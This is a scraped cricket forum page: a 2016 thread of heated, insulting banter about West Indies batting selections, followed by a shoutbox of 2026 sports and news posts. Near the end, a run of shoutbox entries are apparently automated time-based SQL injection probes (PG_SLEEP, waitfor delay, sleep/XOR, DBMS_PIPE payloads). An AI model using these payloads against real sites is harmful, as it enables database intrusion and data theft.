Apology Ketchim

25 Oct 2016 12:09 #324897 by ketchim
Last Active:  Today at 12:05 AMTD came, saw, and just went run away : reading you 2 Comess  :P

• Mail
25 Oct 2016 12:12 #324899 by Mail
You do not have to state you are exiting, just piss off.

25 Oct 2016 12:13 #324901 by mapoui
"running away to get away....haha hehe

you wearing out yuh shoes"

25 Oct 2016 12:13 #324902 by ketchim
Mapoui, TD and dillinger focuses on 1 thru 7 Bats with critique.

Mail and u : have allyuh head stuck up Leon's nether region  :P

Mail with his sh!t for brains even included Hetmeyer  ::LOL::

25 Oct 2016 12:18 #324904 by ketchim
That is why this Forum does NOT take you 2 seriously !

• Mail
25 Oct 2016 12:18 #324905 by Mail
Speaking for the forum again? Thought you were pissing off.

25 Oct 2016 12:19 - 25 Oct 2016 12:24 #324906 by mapoui

what do you want ketchim..... ::confused::

you make no sense.

I posted an 11..spoke of all the players: I want to drop Samules..I did not pick Samules.  I dropped Leon said why....

then the talk pared down to Leon....that is because you feel you have to defend Leon at all costs.  but why in heavens name ::confused::  Leon is not even lil Mohammed..Edwin's son!

I spoke of Chase and Blackwood...I spoke of Blackwood's style, personality and approach and how I would try to get him to his full potential.

I spoke about Chase in reply to you claim that he is a one-off batsman.

it is you who never followed up fully on the 1 through 7 I stated.  I was prepared to go..went already.  you never complemented me and now you attack me for not dealing 1 through 7.

oh well! :( :( :(
Last edit: 25 Oct 2016 12:24 by mapoui.

• Mail
25 Oct 2016 12:21 #324907 by Mail
Do you not get it MAPPIPPEE? Every time a Guyanan is mentioned he gets defensive, ratty and whiney.

I too mentioned Leroy deserved a shot given his domestic performances.

He sees what he wants to and talks no sense and will never accept logic.

I say what I have to say and laugh at the failure.

25 Oct 2016 12:22 #324908 by ketchim
Well to the Viewer: you and Mail have allyuh head

STUCK up 'Loroy' arse hole!

Just consider the readers....and how turned off they are.

TD just logged on... read allyuh trash....and logged off :

SO much for INTELLIGENCE and a sense of humour!

You carry on with the bitter Mail and you will also be ignored!

25 Oct 2016 12:30 - 25 Oct 2016 15:34 #324911 by mapoui
ok!  OK!  I thought I have been humorous.  I thought I had been reasonable.  now I know I am turn off and I chased TD..and Dillinger.

never wud I want to be so offensive as to chase the two best posters on the board..dat is after ketchim of course.

all I can do is my best and if dat is not good enuff I am done...to make room fuh TD and Dillinger..and yourself to light up things, recapture readers interest and make the board live again.

there yuu go ketchim.  its all yours,...TD and Dilly too.

:D :D :D :D :D
:D :D :D :D
:D :D :D
:D :D
:D
Last edit: 25 Oct 2016 15:34 by mapoui.

Time to create page: 0.096 seconds
AlecIf they know it’s rainy season in Jamaica why schedule games for this time? That means Sri Lanka wins the series 1-0 with a whole bunch of time and money down the drain smh.(10.06.2026, 12:34)(12:34)0
villagebelleread the thread villagebelle(22.05.2026, 19:22)(19:22)0
Madelyncreate villagebelle again(22.05.2026, 19:10)(19:10)0
Madelyncreate a new one villagebelle(22.05.2026, 19:08)(19:08)0
KateWTH am I showing up as Kate???(21.05.2026, 19:45)(19:45)0
KateHello Krish. how are you? I need a PW so I can sign in to say hello. Changed computer. Villagebelle(21.05.2026, 19:42)(19:42)0
AlecIs your high school crush still attractive?(19.05.2026, 06:23)(06:23)0
TristonFormer Miami Congressman David Rivera is convicted of secretly lobbying for Maduro’s Venezuela(02.05.2026, 17:39)(17:39)0
TristonAn East Canje, Berbice man was on Thursday remanded to prison after being charged with the attempted murder of his former lover, whom he is accused of shooting.

The accused, Damion Morgan, 28, of Fort Ordinance, East Canje, Berbice, appeared at the New Amsterdam Magistrate’s Court, where he was charged with attempted murder and discharging a loaded firearm with intent, committed against Vasanti Gordon of Islington Village, East Bank Berbice.
(23.04.2026, 18:18)(18:18)0
TristonWest Indies Championship… Harpy Eagles begin title defence with win, Scorpions shock Pride(16.04.2026, 19:28)(19:28)0
TristonMichigan installed as early favorite over UConn in national title game despite Lendeborg injury(05.04.2026, 12:52)(12:52)0
TristonSouth Carolina meets UCLA in NCAA women’s title game seeking a 4th title as Bruins chase their 1st(05.04.2026, 11:58)(11:58)0
TristonJudge halts Trump effort requiring colleges to show they aren’t considering race in admissions(05.04.2026, 11:57)(11:57)0
ChanningExxonMobil Guyana President says Guyanese now make up 70% of oil workforce(22.03.2026, 18:57)(18:57)0
ketchimDhall and Rice !(13.03.2026, 13:41)(13:41)0
AlecWhat food instantly reminds you of home?(10.03.2026, 18:59)(18:59)0
ketchimWorld Cup T20 Umpire cheat us on Hettie LBW(05.03.2026, 19:01)(19:01)0
ketchimIndia win Semi FinalT20 World Cup by 7 runs vs. England !(05.03.2026, 13:43)(13:43)0
RolandAn Alabama circuit judge on Monday denied Alabama basketball player Charles Bediako’s motion for a preliminary injunction, ending the 7-foot center’s collegiate eligibility and his season with the Crimson Tide.(10.02.2026, 12:32)(12:32)0
JacquelineICC travel to Pakistan and Game will Play !(10.02.2026, 11:24)(11:24)0
JosephineSeattle opened as favorites, and they've earned that right, with fantastic play on both sides of the ball. We are leaning in their direction in what should be a high-scoring Super Bowl.(03.02.2026, 19:05)(19:05)0
MaleahBREAKING: The government of Pakistan has said that Pakistan will boycott their T20 World Cup match against India(01.02.2026, 12:02)(12:02)0
ketchimGot Florida Hass theodday from my buddy visiting here !(22.01.2026, 20:37)(20:37)0
ketchimICC tell Bangladseh they will be REPLACED !(22.01.2026, 20:17)(20:17)0
(07.01.2026, 14:14)(14:14)1
MaleahNow that Joe Root has 2 centuries in Australia, I assume those Australian fans, who said he couldn’t be classed as great unless he achieved that, will now say he is?? Given that the great Steve Smith has never scored a test ton in Pakistan….(05.01.2026, 13:31)(13:31)0

(04.01.2026, 15:18)(15:18)0
Gwen20(03.01.2026, 14:42)(14:42)0
Gwen(select 198766*667891 from DUAL)(03.01.2026, 14:42)(14:42)0
Gwen(select 198766*667891)(03.01.2026, 14:42)(14:42)0
Gwen@@iBQ3X(03.01.2026, 14:42)(14:42)0
Gwen20'"(03.01.2026, 14:42)(14:42)0
Gwen20(03.01.2026, 14:42)(14:42)0
Gwen20'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'(03.01.2026, 14:42)(14:42)0
Johan20(03.01.2026, 14:42)(14:42)0
Gwen20*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)(03.01.2026, 14:41)(14:41)0
Gwen20F4owsBb6')) OR 756=(SELECT 756 FROM PG_SLEEP(15))--(03.01.2026, 14:41)(14:41)0
Gwen20axQfaI3h') OR 505=(SELECT 505 FROM PG_SLEEP(15))--(03.01.2026, 14:40)(14:40)0
Gwen20GCVWFMgw' OR 960=(SELECT 960 FROM PG_SLEEP(15))--(03.01.2026, 14:40)(14:40)0
Gwen20-1)) OR 426=(SELECT 426 FROM PG_SLEEP(15))--(03.01.2026, 14:39)(14:39)0
Gwen20-1) OR 573=(SELECT 573 FROM PG_SLEEP(15))--(03.01.2026, 14:39)(14:39)0
Gwen20-1 OR 604=(SELECT 604 FROM PG_SLEEP(15))--(03.01.2026, 14:38)(14:38)0
Gwen20ZWzru47i'; waitfor delay '0:0:15' --(03.01.2026, 14:38)(14:38)0
Gwen20-1 waitfor delay '0:0:15' --(03.01.2026, 14:38)(14:38)0
Gwen20-1); waitfor delay '0:0:15' --(03.01.2026, 14:37)(14:37)0
Gwen20-1; waitfor delay '0:0:15' --(03.01.2026, 14:36)(14:36)0
Gwen(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/(03.01.2026, 14:36)(14:36)0
Gwen200"XOR(20*if(now()=sysdate(),sleep(15),0))XOR"Z(03.01.2026, 14:36)(14:36)0
Gwen200'XOR(20*if(now()=sysdate(),sleep(15),0))XOR'Z(03.01.2026, 14:35)(14:35)0
Gwen20*if(now()=sysdate(),sleep(15),0)(03.01.2026, 14:35)(14:35)0
Shayla